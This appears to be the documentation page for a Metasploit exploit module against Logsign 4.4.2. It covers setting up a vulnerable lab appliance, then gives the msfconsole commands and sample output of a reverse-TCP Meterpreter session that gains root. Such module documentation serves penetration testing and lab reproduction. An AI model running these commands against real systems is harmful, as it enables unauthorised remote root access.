documentation/modules/exploit/linux/http/logsign_exec.md
Download the vulnerable version of OVA or ISO file from following URL. I strongly suggest you to choose OVA.
Download links are provided for reference only and are not maintained by the project. Utilize at your own risk! http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso
Ubuntu 12.04.05 LTS - logsign customer tty1
IP: 12.0.0.10
...
Version: Focus
4.4.2
https://<ip_address> through your browser.Please follow below instructions if you are seeing different IP address on the screen that doesn't belong to your NAT network range.
Right after step 3, I've started to see totally different IP address on the screen which was something like 10.0.0.X. Since there is no such a network range in my configuration, it's impossible access to the machine through network. Here is the steps that shows how you can fix this issue. Follow these instructions and then go back to the step 5.
shift button at the very beginning and keep pressing until you see GRUB menu.mount -rw -o remount /
passwd root
reboot
/etc/network/interfaces file and perform necessary changes. Here is my own configuration.address 12.0.0.10
netmask 255.255.255.0
<removed line starting with 'network'>
<removed line starting with 'broadcast'>
gateway 12.0.0.2
dns-nameservers 8.8.8.8
msfconsoleuse exploit/linux/http/logsign_execset rhost 12.0.0.10python/meterpreter/reverse_tcp is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type.set LHOST 12.0.0.1check and validate that you are seeing following output.[+] 12.0.0.10:80 The target is vulnerable.
exploit and hit the enter.[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Delivering payload...
[*] Sending stage (38651 bytes) to 12.0.0.10
[*] Meterpreter session 2 opened (12.0.0.1:4444 -> 12.0.0.10:46057) at 2017-02-28 14:11:20 +0100
meterpreter > getuid
Server username: root
meterpreter >